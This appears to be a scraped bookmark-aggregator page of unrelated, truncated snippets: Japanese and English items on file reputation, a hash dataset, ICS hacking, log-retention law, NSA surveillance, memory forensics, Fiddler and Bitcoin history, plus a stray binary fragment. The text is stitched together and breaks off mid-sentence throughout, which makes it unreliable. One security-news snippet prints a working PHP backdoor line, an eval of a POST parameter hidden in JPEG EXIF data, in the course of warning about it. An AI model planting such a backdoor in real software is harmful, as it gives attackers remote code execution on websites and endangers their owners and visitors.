ファイル情報 Web サイトへようこそ。このサイトは、ユーザーが Windowsファイル に関する情報を交換できる、もっとも成長している Web コミュニティーの1つです。私達のデータバンクには何千ものファイル情報と評価情報が蓄積されています。リサーチセンター、専門家の参加そしてモデレーターの介在によって提供内容の質を保っています。 このファイル情報 サイトはモデレーターがいるオープンフォーラムです。スパムや関連性のない投稿は取り除かれてています。 ファイルのスコア方法 ファイルは、組込まれ隠し機能(キーボードの監視、自動スタートエントリー、ブラウザ管理および操作)のプロパティーとプロセスのタイプ(可視ウィンドウやシストレイプログラム、DLL、IEプラグイン、サービスなど)をテクニカルに分析し評価します。セキュリティスコアは、そのプロセスがスパイウェアやマルウェア、トロイの木馬である可能性
NSRLJPはNSRL(http://www.nsrl.nist.gov/)を補完することを目的としたハッシュデータセット(ハッシュライブラリ)です。 ダウンロード NSRLJP_202104.7z (SHA-256: ccf8cba3b4dbfd7c1252dbaaccbb661861794b205ad3a1d7884e785e12ca5d4d) (ハッシュ数: 4,142,267, ファイルサイズ: 253,337,631バイト) 免責およびライセンス 個人、商用を問わず自由に利用することができます。ただし、本データセットの利用により生じた問題については責任を負いかねます。 説明 NSRLは数千万規模のハッシュが提供されていて定期的にアップデートされていますが、日本語環境には最適といえません。NSRLJPは、NSRLのフォーマット(RDS)準拠の日本語関連のソフトウェアを中心とするハッ
9002..................wx....9002..................wx....9002....................... 9002..................wx....9002..................wx....9002........................9002........!............. .....9002..... .............p.....MZ..................@..:...X..'........!..L.!This program cannot be run in DOS mode.
Update February 2015 Use the new link below for a new interface and updates. Traffic analysis has been the primary method of malware identification and thousands of IDS signatures developed are the daily proof. Signatures definitely help but ability to visually recognize malware traffic patterns has been always an important skill for anyone tasked with network defense. The number of malware analy
私が制御システムに根こそぎ侵入した方法 2014年01月20日15:15 ツイート daiki_fukumori オフィシャルコメント by:福森 大喜 昨年も紹介したS4という制御システムに関するカンファレンスで、今年はICS Villageという新しい企画(公式サイト)がありました。制御システム用の機器を用意し、みんなで攻撃してみるというイベントです。 会場では、4つのセグメント(コーポレートゾーン、DMZ、制御センターゾーン、フィールドゾーン)からなるネットワークが構築され、参加者は無線を使ってコーポレートゾーンに接続できるようになっていました。 攻撃の最終目的はフィールドゾーンにアクセスし、フィールド機器(多くはPLCと呼ばれる機器)の制御を乗っ取ることですが、各セグメントの間にはファイアウォールがありますので簡単にはフィールドゾーンにたどり着くことすらできません。運営側に確認し
ISPの会社で総務省や業界団体に係る仕事を通じて得た、インターネット関連の政策動向で重要と思われることを書きます。ここに書かれているのは筆者の主観による個人的な見解で、会社や団体の見解ではありません。また内容は全て公開されている情報のみをベースにし、筆者の知りえた範囲で書きますので全てをカバーしているものではありません。 どういう訳か、最近通信ログの保存について、あちこちから質問されることが多いので、事実関係をまとめておきます。 まず、通信ログという言葉の定義ですが、法律では「通信履歴」となっているようです。いわゆるサイバー刑法として騒がれ、平成23年に「情報処理の高度化等に対処するための刑法等の一部を改正する法律案」で改正された、刑事訴訟法197条に以下のように書かれています。 「電気通信を行うための設備を他人の通信の用に供する事業を営む者又は自己の業務のために不特定若しくは多数の者の通
国家安全保障局 (NSA)がユタ州の山間の町ブラフデールに巨大な情報監視センターを密かに建設中であることが、長年NSAの動きを追い続けてきたジェイムズ・バンフォード記者のスクープで判明しました。 「ステラウィンド」という極秘の監視プログラムの一環で、NSAは米国中に盗聴ポストを設けて国内および国外から発信される膨大な数の電子メールや携帯電話の内容を収集しています。ユタ州に建設される巨大データセンターは10万平米の敷地を持ち、無尽蔵の収容能力を持ちます。ここに一般国民のメールや会話、ネット検索履歴、チケットや乗車券の購入、旅行日程、書店での購買記録などあらゆる個人情報が蓄積され、高速ネットワークでつながった全国各地のNSA拠点からデータにアクセスしてします。 NSAはCIAと並ぶ米国のインテリジェンス・コミュニティの中核組織ですが、その活動は秘密のベールに包まれています。CIA が人間に対す
こちらの無料背景素材集(「繁華街・ショップ」「公園」「住宅街」「学校」「神社」「山」「空」)は、PhotoDramatica-PROをベースにして、多少レタッチも加えて仕上げられています。 この画像作成にかかった時間は、以下の通りです。(Photoshopのバッチ処理を利用して一括生成しているので、1枚1枚生成する場合よりも短い時間で生成できています) 枚数:場面数87 x 差分0~8枚 作成画像枚数:562枚(差分込み) 作成日数:13日(写真撮影日を含まず) 作成時間数:55時間 1日あたりの平均作業時間:4時間10分程度 背景1場面(差分を全て含む)あたりの平均作成時間:38分 背景1枚あたりの平均作成時間:約6分 HTMLと動画で分かりやすく、詳しく解説 この教材は、主にHTMLのテキストと動画で構成されています。動画では、処理過程の最初から最後までを通して説明していて、HTMLの
This site is an archive of the Volatility Labs blog. The blog has moved to https://volatilityfoundation.org/volatility-blog/ Those of you who attended OMFW 2013 received a talk on Windows 8 and Server 2012 memory forensics with Volatility. One of the interesting aspects of this new operating system, which includes 8.1 and 2012 R2, is that the kernel debugger data block (_KDDEBUGGER_DATA64) is enco
今までFiddlerをただのセッションの中身を確認できるLocal Proxyとしてしか見ていなかったのですが 改めて良く調べると色々できることが多すぎると判明。感動したので便利な機能をまとめてみました。 先に簡単に説明しておくと、FiddlerはMicrosoftが無料で配布しているWeb Debugging Proxyです。 Windows環境にインストールして、ブラウザとサーバの間の通信を読んだり操作したりできます。 配布サイトはこちら。 Fiddler Web Debugger – A free web debugging tool 動作環境は「Windows 2000 / XP / 2003 / Vista with Microsoft .NET Framework v2.0 or later」 今回使ったバージョンは、2009年9月10日時点で最新の安定版、2.2.4.6。 と
Microsoft 製品の無償評価版の入手方法 TechNet サブスクリプションが廃止されるため、それ以外の無償で利用できる評価版ソフトウェアの入手方法をまとめてみました。参考にしてください。 13 Jan 2014 TechNet Evaluation Center 最新版の Microsoft 製品 (開発製品を除く) の評価版がダウンロードできます。 technet.microsoft.com TechNet Evaluation Center 以前のバージョン 最新版ではないメインストリーム サポート フェーズの製品 (開発製品を除く) の評価版がダウンロードできます。 technet.microsoft.com MSDN Evaluation Center 開発製品の評価版がダウンロードできます。 msdn.microsoft.com Visual Studio のダウンロード
36. なぜ最初にピザを買えたか 10kBTC = $41 Bitcoin Market 先に取引所が立ち上がって いたので裁定取引が可能 Pizza for bitcoins? by laszlo I'll pay 10,000 bitcoins for a couple of pizzas.. like maybe 2 large ones so I have some left over for the next day. I like having left over pizza to nibble on later. May 18, 2010, 12:35:20 AM jercos So nobody wants to buy me pizza? Is the bitcoin amount I'm offering too low? May 21, 2010, 07:06:58
今回は攻撃者による“だまし”に関するブログを中心に紹介する。最初は、JPEG画像のメタデータにマルウエアを仕込むケース。JPEG画像のメタデータにマルウエアを仕込んだPHPバックドアをスペインのドメイン(.es)で見つけたとして、ブログで注意を促している。同様の手口は、今年6月に米スキュリが報告している。 JPEGファイルのコードを見ると興味深い文字列が並んでおり、画像のEXIFデータと合致する。 JPEGファイルのコード 画像のEXIFデータ EXIFデータのModelo(モデル)情報とMarca(メーカー)情報に同じ文字列が確認できる。これを解読すると「if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"])); 」となり、POSTパラメータ「zz1」を通じて取得するいかなる数値も実行する。 コードの実行には、PHPの「ex
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く